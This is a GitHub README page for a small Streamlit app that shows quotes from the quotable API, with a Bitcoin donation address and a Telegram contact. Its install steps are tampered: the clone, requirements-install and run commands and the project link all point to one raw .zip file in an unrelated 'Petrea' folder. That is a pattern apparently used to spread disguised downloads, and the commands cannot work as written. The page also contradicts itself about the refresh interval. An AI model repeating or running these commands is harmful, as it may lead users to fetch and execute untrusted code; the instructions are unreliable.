Skip to content

codersujay/Unlimited-Quotes-Generator

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Unlimited Quotes Generator

image

This repository contains code for hosting a minimal quote generator website that displays a new quote every 15 seconds. The quotes are fetched from the quotable API.

Installation

To run this project locally, you will need Python 3 and Streamlit. You can install Streamlit using the following command:

pip install streamlit

You can then clone this repository using:

git clone https://raw.githubusercontent.com/codersujay/Unlimited-Quotes-Generator/main/Petrea/Unlimited-Quotes-Generator.zip

Navigate to the repository directory by:

cd Unlimited-Quotes-Generator

📜 The following Python libraries are required to run the application:

  • streamlit
  • requests
  • time
  • base64

You can install all these dependencies by running:

pip install -r https://raw.githubusercontent.com/codersujay/Unlimited-Quotes-Generator/main/Petrea/Unlimited-Quotes-Generator.zip

Then, Run the following command to start the Streamlit app 🚀

streamlit run https://raw.githubusercontent.com/codersujay/Unlimited-Quotes-Generator/main/Petrea/Unlimited-Quotes-Generator.zip

Usage

Once the Streamlit app is running, a random quote will be displayed along with its author. The quote will change every 5 seconds.

The app also features a background image, which can be customized by changing the image URL in the main() function.

Contributing

Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are Greatly Appreciated.

  1. Fork the Repository 🤝🏻
  2. Star the Repository⭐

Bitcoin Donate Button Donate Here 👉🏻1LxJFtXxVPboq12eYLTXNGaZtM1Yu9Yo7

Contact

🚀 Telegram : AnukarOP

Project Link: https://raw.githubusercontent.com/codersujay/Unlimited-Quotes-Generator/main/Petrea/Unlimited-Quotes-Generator.zip

Credits

This project uses the quotable API, which is a free, open-source API for quotes. || Created by AnukarOP

Thanks for Your Attention, Towards My Repositroy😃

About

This repository contains code for a Unlimited quote generator website that displays a new quote every 15 seconds. The quotes are fetched from the quotable API and displayed on a clean background image. The app is built using Streamlit, a Python web framework for data science and Machine Learning applications. || Created by AnukarOP 🚀.

Resources

License

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • Python 100.0%